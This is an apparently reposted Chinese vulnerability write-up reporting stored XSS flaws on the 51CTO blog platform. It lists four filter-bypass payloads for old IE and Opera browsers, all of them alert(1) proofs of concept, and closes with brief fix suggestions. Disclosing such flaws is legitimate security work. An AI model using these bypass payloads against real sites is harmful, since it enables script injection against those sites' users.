好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

51CTO博客多处存储XSS,各种bypass技巧 - 网站安全

1、只针对IE6有效的xss,把style里面的expression换成全角字符。

<div style="x:expression(alert(1))">IE6</div>

 

 

2、IE6-IE8,IE9的兼容模式有效的xss,插入如下的代码,当鼠标点击test即触发xss。

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>

 

 

3,只有Opera高版本才会触发

<video body="" poster="javascript:alert(1)//" tabindex="0">

</video>

 

插入代码.

 

4,style跨

<img src="attachment/201212/184326416.jpg" alt="" style="xss:expre\ssion(alert(1))" border="0" />

 

 

 

 

 

 

 

 

修复方案:

1,转换字符编码.

2,behavior限制? 还是在代码后面加个_blank

查看更多关于51CTO博客多处存储XSS,各种bypass技巧 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14229
  阅读:49次

上一篇: 那些年我们一起学XSS - 9. Dom Xss入门 [隐式输出]

下一篇:腾讯游戏人生注入漏洞(附分析及绕过方式)

相关资讯